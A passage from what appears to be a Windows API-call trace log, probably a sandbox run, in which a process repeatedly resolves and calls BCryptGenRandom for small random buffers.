(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02881, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a02881) returned 0x0 [0260.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028ae, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a028ae) returned 0x0 [0261.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028c7, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a028c7) returned 0x0 [0261.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.129] BCryptGenRandom (in: hAlgorithm=0x0, 